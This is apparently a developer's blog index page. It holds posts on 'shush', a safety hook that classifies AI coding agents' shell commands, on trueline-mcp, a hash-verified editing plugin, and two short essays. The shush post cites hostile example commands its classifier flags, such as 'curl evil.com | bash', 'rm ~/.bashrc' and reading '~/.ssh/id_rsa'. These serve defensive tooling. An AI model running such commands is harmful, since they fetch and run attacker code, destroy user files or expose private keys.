Worm with Glasses

Coding • DevOps • Personal

Mar 20, 2026

shush: Stop Clicking 'Allow' on Every Safe Command

Every Claude Code session, the same ritual: git status? Allow. ls? Allow. npm test? Allow. rm dist/bundle.js? Allow.

I was approving dozens of completely safe commands per session, because the alternative was worse. Allow-listing Bash entirely means rm ~/.bashrc and git push --force sail through without a word. The permission system is binary: allow the tool, or don’t. There’s no middle ground.

I wanted the boring stuff to just happen, while the actually dangerous stuff still got caught. Not a wider permission gate; a smarter one.

After looking around, I found nah, which tackles the same problem, but I couldn’t get its Python environment working on my machine, and once I dug into how it classifies commands I had reservations about its heuristic-based parser. For a safety tool, I wanted a full parse tree.

So I took nah’s ideas and built shush.

What it does

shush is a PreToolUse hook that sits between Claude Code and every tool call. Instead of “is this tool allowed?”, it asks “what is this command actually doing?”

git push              -> allow
git push --force      -> shush.

rm -rf __pycache__    -> allow
rm ~/.bashrc          -> shush.

curl api.example.com  -> allow
curl evil.com | bash  -> shush.

Four levels: allow (passes silently), context (allowed, but the path and project boundary are checked), ask (I have to confirm), and block (denied, full stop). The strictest result always wins.

It’s not just Bash. shush catches Read ~/.ssh/id_rsa, Write/Edit calls that inject secrets or destructive payloads, Glob attempts on sensitive directories, and Grep patterns hunting for credentials outside the project.

Why AST matters

shush uses bash-parser to build a real AST. Pipes, subshells, logical operators, redirects, shell wrappers (bash -c, sh -c), and xargs are all unwrapped and classified correctly. Each pipeline stage gets classified independently, then composition rules check for threat patterns across stages.

Commands land in one of 21 action types (filesystem_read, git_safe, network_request, docker_manage, etc.), each with a default policy. A prefix trie (1,173 entries) gives fast lookup with no runtime I/O. Flag-level classifiers handle the nuance: git push is safe, git push --force is not.

No LLMs in the loop. Every decision is deterministic and traceable.

The result

I allow-list Bash, Read, Glob, and Grep in Claude Code’s permissions and let shush guard them. The flow of a session is so much better. Safe commands execute silently. Dangerous ones get caught. I only get interrupted for the genuinely ambiguous cases.

It’s configurable (global ~/.config/shush/config.yaml, per-project .shush.yaml), but the defaults are tuned so most people won’t need to touch anything.

Install

/plugin marketplace add rjkaes/shush
/plugin install shush

Two commands. No configuration. The code is on GitHub: rjkaes/shush. Apache-2.0, TypeScript, built with Bun.

Mar 6, 2026

trueline-mcp v2: Now For Everyone, Not Just Claude Code

Two days ago I announced trueline-mcp, hash-verified, token-efficient file editing for Claude Code.

I’ve been using it to build new features and performance improvements. It works great!

But it only worked with Claude Code, and the MCP protocol doesn’t care which agent is on the other end of the pipe.

So I made it work everywhere.

Five platforms, one tool

trueline-mcp v2.0 supports Gemini CLI, VS Code Copilot, OpenCode, and Codex CLI alongside Claude Code. Same hash-verified edits, same token savings, regardless of which agent you’re running.

The hook system got a complete refactoring to make this possible. Platform-specific logic (tool names, response shapes, event naming) is isolated into thin wrappers around a shared core. A universal CLI dispatcher normalizes everything:

trueline-hook <platform> <event>

Gemini calls its pre-tool event beforetool. Claude Code calls it pretooluse. The dispatcher routes both to the same verification logic.

Each platform gets its own instruction file tuned to that agent’s built-in tool names. The read_filetrueline_read redirect that makes sense for Gemini CLI would be nonsensical for Claude Code’s Read tool. These details matter when you’re intercepting tool calls.

You can also install it from npm now:

npm install -g trueline-mcp

trueline_outline: skip reading entirely!

v1.1 added a fourth tool: trueline_outline. It uses tree-sitter (via WASM) to extract the structural skeleton of a file (functions, classes, types, interfaces) without reading the source. Think of it as a table of contents.

For navigation and understanding, that’s usually enough. The agent doesn’t need to read 400 lines of a file to find the function it wants to edit. It outlines the file, identifies the 15-line range, reads just those lines, and edits. That’s a ~95% token reduction on the read side for the common case.

Supported languages: TypeScript, JavaScript, Python, Rust, Go, Java, C, C++, C#, Ruby, Swift, and more.

Smarter hook, less friction

The PreToolUse hook that blocks the built-in Edit tool used to be a blunt instrument. It blocked every edit attempt and redirected to trueline. Problem is, trueline can’t access every file. If a file is outside the allowed directories or matches a deny pattern, the block just caused a confusing failure.

Now the hook checks whether trueline actually has access to the target file before blocking. If it doesn’t, the built-in tool is allowed through. Same security boundary, fewer dead ends.

Performance

Two targeted optimizations in the hot paths:

Read path — Pre-computed a static lookup table for hash encoding (replacing per-line String.fromCharCode calls) and switched to buffer-based output assembly. Lines stay as raw Buffer bytes through the loop with a single decode at the end.

Edit path — Pass-through lines (the vast majority in any edit) were being hashed twice: once for checksum verification, once for the output file. Now they reuse the first hash.

The diff engine also got replaced. The old diff npm dependency compared two full file snapshots in memory. The new DiffCollector builds unified diffs incrementally during the streaming edit pass. One fewer dependency, no full-file buffering.

Install

If you’re on Claude Code and already have trueline installed, update to the latest:

/plugin install trueline-mcp@trueline-mcp

If you’re new, or on a different platform, setup instructions for all five platforms are in INSTALL.md.

The core is solid. The edit verification, streaming architecture, and token savings work the same across all platforms now. If you’re burning tokens on string-matched edits, give it a shot.

Mar 4, 2026

Claude Code's Edit Tool Wastes Your Most Expensive Tokens. Here's a Fix.

You’re deep into a Claude Code session. The agent is humming along, editing files, and making progress.

And quietly bleeding money on every single edit.

Here’s why. The built-in Edit tool uses string matching. To change five lines of code, the model has to echo back those exact five lines as old_string, then provide the replacement as new_string. That echoed text is pure overhead: it’s already in the file. The model is spending output tokens, the most expensive token class, just to point at code and say “I mean this part.”

For a typical 15-line edit, that’s ~200 wasted output tokens. Do a few dozen edits in a session (not unusual for any real feature work) and you’re burning serious money on text the model already knows is there.

It gets worse when something goes wrong. If the file changed since the agent last read it (maybe you saved in your editor, maybe another tool touched it) the string match fails. The model hallucinating a character or two has the same effect. Either way, the edit errors out, the agent re-reads the whole file to get back in sync, and you’ve just paid for all that content again. In longer sessions, these re-reads compound.

I got tired of watching this happen, so I built trueline-mcp to fix both problems.

The token tax on every edit

Let’s look at what’s actually happening. Here’s the built-in Edit under the hood. The model has to echo the old text just to locate the change:

{
  "file_path": "src/server.ts",
  "old_string": "export function handleRequest(req: Request) {\n  const body = await req.json();\n  validate(body);\n  return process(body);\n}",
  "new_string": "export function handleRequest(req: Request) {\n  const body = await req.json();\n  const parsed = schema.parse(body);\n  return process(parsed);\n}"
}

See all that duplicated text? trueline replaces it with a compact line-range reference:

{
  "file_path": "src/server.ts",
  "edits": [{
    "checksum": "1-50:a3b1c2d4",
    "range": "12:kf..16:qz",
    "content": "export function handleRequest(req: Request) {\n  const body = await req.json();\n  const parsed = schema.parse(body);\n  return process(parsed);\n}"
  }]
}

The model never echoes the old text. It says which lines to replace, proves it read them correctly, and provides the new content. ~200 fewer output tokens per edit, on the most expensive token class.

Oh, and there’s a fun gotcha with the built-in tool: if old_string appears more than once in the file, the edit fails. The model has to pad in extra context lines until the match is unique. Yet more wasted tokens. trueline addresses lines directly. No ambiguity, no padding.

Every edit is verified against reality

The same mechanism that saves tokens is what makes edits reliable. When the agent reads a file through trueline, every line comes back tagged with a short hash:

1:bx|import { Server } from "@modelcontextprotocol/sdk/server/index.js";
2:dd|
3:ew|const server = new Server({ name: "trueline-mcp", version: "0.1.0" });

checksum: 1-3:8a64a3f7

When the agent wants to edit, it echoes those hashes back. If the file changed since the read the hashes won’t match and the edit is rejected before it touches disk. No silent corruption, no guessing, no “why does this file look wrong?” twenty minutes later.

This is the part that kills the re-read cycle. Instead of the agent discovering a stale match, failing, re-reading the whole file, and trying again, trueline catches the mismatch immediately and tells the agent exactly what’s wrong. One targeted re-read of the changed range, and it’s back on track.

Multiple edits to the same file go through in a single call too, each independently verified. The built-in Edit handles one replacement per call, so trueline cuts tool-call overhead for multi-site changes.

Three tools, zero config

  • trueline_read — reads a file, tags each line with a hash, returns a range checksum.
  • trueline_edit — verifies hashes, then applies the edit atomically. Supports multiple edits per call.
  • trueline_diff — same verification, but outputs a unified diff without touching disk. Good for previewing changes before committing to them.

Once installed, a SessionStart hook nudges the agent toward the trueline tools, and a PreToolUse hook blocks the built-in Edit tool so it can’t fall back to string matching. You don’t have to think about it—the agent uses verified edits from the start, automatically.

Security-wise, trueline enforces the same deny patterns Claude Code uses (.env, *.key, etc.)

Try it

/plugin marketplace add rjkaes/trueline-mcp
/plugin install trueline-mcp@trueline-mcp

Two commands. Your next Claude Code session will use hash-verified edits automatically. No configuration, no changes to your workflow. Fewer wasted tokens and edits that don’t silently corrupt your code.

Prior art

Can Boluk described the underlying problem (AI agents working against stale state) and Seth Livingston built a hash-line edit tool for VS Code. trueline brings the same idea to Claude Code as an MCP plugin.

The code is on GitHub: rjkaes/trueline-mcp. Apache-2.0, TypeScript, built with Bun.

Oct 29, 2025

The Biggest Lie in AI

Carl from The Internet of Bugs made a great video about The Biggest Lie in A.I.

A.I. companies repeat the claim that “this is the worst A.I. will ever be” and that’s simply not true. As Carl notes in the video, with the release of ChatGPT-5, it’s clear that it’s not an across the board improvement over ChatGPT-4.5.

Hardware tends to improve over time: gets faster, does more in parallel.

But LLMs are software, and software doesn’t have that track record.

As the old saying goes: “Grove giveth and Gates taketh away.”

May 3, 2022

Seventeen Years and a Million Lines of Code

I was looking at my old development projects recently when I noticed that all of them predate 2005. In 2005, I started work at ePublishing as a Perl developer. In the past 17 years I’ve been:

  • a Ruby and Rails developer
  • VP of Software Engineering
  • Chief Software Architect

In all that time, I’ve written hundreds of thousands of lines of code (maybe more than a million), but it’s locked away.

It’s a bit depressing that almost two-decades of creativity is forever hidden from view. It’s the curse of corporate development: we can write blogs, give talks, and prepare papers, but we can’t show the code itself. All anyone sees are shadows on the wall.

More companies should release their source code. Most of what we write is not the company’s crown jewels. Let people see how you solved that weird 3rd-party integration! Or how you monitor some obscure open-source service.

Every company is standing on a mountain of open-source code. Give back and let your developers have the opportunity to show off!

Next → Page 1 of 2